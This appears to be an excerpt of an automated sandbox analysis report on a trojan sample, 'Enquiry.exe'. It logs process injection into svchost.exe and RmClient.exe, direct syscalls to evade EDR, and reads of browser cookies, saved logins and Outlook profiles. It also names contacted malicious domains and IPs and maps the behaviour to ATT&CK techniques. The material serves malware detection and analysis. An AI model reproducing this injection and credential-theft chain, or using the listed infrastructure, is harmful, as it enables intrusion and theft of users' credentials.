            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]1_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]1_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052835 mov ecx, dword ptr fs:[00000030h]1_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]1_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]1_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A830 mov eax, dword ptr fs:[00000030h]1_2_0306A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D483A mov eax, dword ptr fs:[00000030h]1_2_030D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D483A mov eax, dword ptr fs:[00000030h]1_2_030D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03042840 mov ecx, dword ptr fs:[00000030h]1_2_03042840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03060854 mov eax, dword ptr fs:[00000030h]1_2_03060854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034859 mov eax, dword ptr fs:[00000030h]1_2_03034859
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Source: C:\Users\user\Desktop\Enquiry.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\RmClient.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: NULL target: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: NULL target: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeThread register set: target process: 2676Jump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeThread APC queued: target process: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeJump to behavior
            Source: C:\Users\user\Desktop\Enquiry.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 32F008Jump to behavior
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
            Source: C:\Users\user\Desktop\Enquiry.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Enquiry.exe"Jump to behavior
            Source: C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exeProcess created: C:\Windows\SysWOW64\RmClient.exe "C:\Windows\SysWOW64\RmClient.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
            Source: Enquiry.exe, lOHjHqJCgqObv.exe, 00000003.00000000.1859019153.0000000001810000.00000002.00000001.00040000.00000000.sdmp, lOHjHqJCgqObv.exe, 00000003.00000002.3533810576.0000000001810000.00000002.00000001.00040000.00000000.sdmp, lOHjHqJCgqObv.exe, 00000007.00000002.3533824927.0000000001950000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: lOHjHqJCgqObv.exe, 00000003.00000000.1859019153.0000000001810000.00000002.00000001.00040000.00000000.sdmp, lOHjHqJCgqObv.exe, 00000003.00000002.3533810576.0000000001810000.00000002.00000001.00040000.00000000.sdmp, lOHjHqJCgqObv.exe, 00000007.00000002.3533824927.0000000001950000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: lOHjHqJCgqObv.exe, 00000003.00000000.1859019153.0000000001810000.00000002.00000001.00040000.00000000.sdmp, lOHjHqJCgqObv.exe, 00000003.00000002.3533810576.0000000001810000.00000002.00000001.00040000.00000000.sdmp, lOHjHqJCgqObv.exe, 00000007.00000002.3533824927.0000000001950000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: lOHjHqJCgqObv.exe, 00000003.00000000.1859019153.0000000001810000.00000002.00000001.00040000.00000000.sdmp, lOHjHqJCgqObv.exe, 00000003.00000002.3533810576.0000000001810000.00000002.00000001.00040000.00000000.sdmp, lOHjHqJCgqObv.exe, 00000007.00000002.3533824927.0000000001950000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: Enquiry.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3532848428.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1991008499.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3534273215.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2000492218.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1997146655.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3533106895.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3536218795.0000000005770000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3534236092.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: Enquiry.exeBinary or memory string: WIN_XP
            Source: Enquiry.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: Enquiry.exeBinary or memory string: WIN_XPe
            Source: Enquiry.exeBinary or memory string: WIN_VISTA
            Source: Enquiry.exeBinary or memory string: WIN_7
            Source: Enquiry.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3532848428.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1991008499.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3534273215.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2000492218.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1997146655.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3533106895.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3536218795.0000000005770000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3534236092.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts
            2
            Native API
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            4
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts
            1
            Abuse Elevation Control Mechanism
            1
            Deobfuscate/Decode Files or Information
            21
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts
            3
            Obfuscated Files or Information
            NTDS16
            System Information Discovery
            Distributed Component Object Model21
            Input Capture
            4
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation
            1
            DLL Side-Loading
            LSA Secrets141
            Security Software Discovery
            SSH3
            Clipboard Data
            Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection
            2
            Valid Accounts
            Cached Domain Credentials2
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion
            DCSync3
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation
            Proc Filesystem11
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1515808 Sample: Enquiry.exe Startdate: 23/09/2024 Architecture: WINDOWS Score: 100 28 www.uburn.xyz 2->28 30 www.nakama2-sshl.xyz 2->30 32 17 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 4 other signatures 2->50 10 Enquiry.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 66 Switches to a custom stack to bypass stack traces 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 lOHjHqJCgqObv.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 RmClient.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 lOHjHqJCgqObv.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.uburn.xyz 67.223.117.189, 49742, 49743, 49745 VIMRO-AS15189US United States 22->34 36 www.nakama2-sshl.xyz 183.181.83.131, 49755, 49756, 49757 VECTANTARTERIANetworksCorporationJP Japan 22->36 38 7 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Enquiry.exe64%ReversingLabsWin32.Trojan.Autoitinject
            Enquiry.exe67%VirustotalBrowse
            Enquiry.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            komart.shop0%VirustotalBrowse
            www.nakama2-sshl.xyz0%VirustotalBrowse
            94950.bodis.com0%VirustotalBrowse
            o731lh.vip0%VirustotalBrowse
